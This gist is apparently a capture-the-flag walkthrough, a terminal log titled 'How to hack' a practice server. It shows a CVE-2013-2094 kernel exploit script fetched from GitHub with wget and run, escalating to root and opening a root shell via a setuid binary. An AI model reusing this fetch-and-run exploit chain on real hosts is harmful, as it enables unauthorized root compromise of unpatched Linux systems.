Created
February 13, 2014 17:07
-
-
Save kusano/8979286 to your computer and use it in GitHub Desktop.
How to hack ctfq.sweetduet.info:10022
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [q13@localhost hack]$ wget https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh | |
| --2014-02-14 02:05:38-- https://raw.github.com/Pashkela/CVE-2013-2094/master/run.sh | |
| Resolving raw.github.com... 103.245.222.133 | |
| Connecting to raw.github.com|103.245.222.133|:443... connected. | |
| HTTP request sent, awaiting response... 200 OK | |
| Length: 80790 (79K) [text/plain] | |
| Saving to: “run.sh” | |
| 100%[================================================>] 80,790 --.-K/s in 0.02s | |
| 2014-02-14 02:05:38 (4.16 MB/s) - “run.sh” saved [80790/80790] | |
| [q13@localhost hack]$ sh run.sh | |
| Compiling exp_abacus.c...OK. | |
| [+] Resolved set_fs_root to 0xc0555cf0 (via System.map) | |
| [+] Resolved set_fs_pwd to 0xc0555c90 (via System.map) | |
| [+] Resolved __virt_addr_valid to 0xc0438b10 (via System.map) | |
| [+] Resolved init_task to 0xc0a425e0 (via System.map) | |
| [+] Resolved init_fs to 0xc0a58320 (via System.map) | |
| [+] Resolved default_exec_domain to 0xc0a48480 (via System.map) | |
| [+] Resolved bad_file_ops to 0xc0851e60 (via System.map) | |
| [+] Resolved bad_file_aio_read to 0xc0545440 (via System.map) | |
| [+] Resolved ima_audit to 0xc0c31904 (via System.map) | |
| [+] Resolved ima_file_mmap to 0xc05c7660 (via System.map) | |
| [+] Resolved ima_bprm_check to 0xc05c7630 (via System.map) | |
| [+] Resolved ima_file_check to 0xc05c7600 (via System.map) | |
| [+] Resolved selinux_enforcing to 0xc0c2f498 (via System.map) | |
| [+] Resolved selinux_enabled to 0xc0a5d7a0 (via System.map) | |
| [+] Resolved security_ops to 0xc0c2e450 (via System.map) | |
| [+] Resolved default_security_ops to 0xc0a5b9c0 (via System.map) | |
| [+] Resolved sel_read_enforce to 0xc05b5140 (via System.map) | |
| [+] Resolved audit_enabled to 0xc0bfc944 (via System.map) | |
| [+] Resolved commit_creds to 0xc047d9e0 (via System.map) | |
| [+] Resolved prepare_kernel_cred to 0xc047de10 (via System.map) | |
| [+] Resolved xen_start_info to 0xc0b57004 (via System.map) | |
| [+] Resolved ptmx_fops to 0xc0c367a0 (via System.map) | |
| [+] Resolved mark_rodata_ro to 0xc0433300 (via System.map) | |
| [+] Resolved set_kernel_text_ro to 0xc04333d0 (via System.map) | |
| [+] Resolved make_lowmem_page_readonly to 0xc04055a0 (via System.map) | |
| [+] Resolved make_lowmem_page_readwrite to 0xc0405560 (via System.map) | |
| [+] Resolved perf_swevent_enabled to 0xc0c26000 (via System.map) | |
| [+] Resolved ptmx_fops to 0xc0c367a0 (via System.map) | |
| [!] Array base is 0xc0c26000 | |
| [!] Detected structure size of 4 bytes | |
| [!] Targeting 0xc0c367b0 | |
| [+] Got ring0! | |
| [+] Detected 2.6/3.x style 8k stacks, with current at 0xdca51550 and cred support | |
| [+] Disabled security of : nothing, what an insecure machine! | |
| [+] Found ->fs offset at 0x3ac | |
| [+] Broke out of any chroots or mnt namespaces | |
| [+] Got root! | |
| [+] UID 0, EUID:0 GID:0, EGID:0 | |
| [+] Run ./suid "ls -la;id": | |
| total 96 | |
| drwxrwxr-x 2 q13 q13 4096 Feb 14 02:05 . | |
| drwxrwx-wt. 15 root root 4096 Feb 14 02:05 .. | |
| -rw-rw-r-- 1 q13 q13 80790 Feb 14 02:05 run.sh | |
| -rwsrwsr-x 1 root root 4892 Feb 14 02:05 suid | |
| uid=0(root) gid=0(root) groups=0(root) | |
| [q13@localhost hack]$ ./suid sh | |
| sh-4.1# whoami | |
| root | |
| sh-4.1# id | |
| uid=0(root) gid=0(root) groups=0(root),507(q13) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment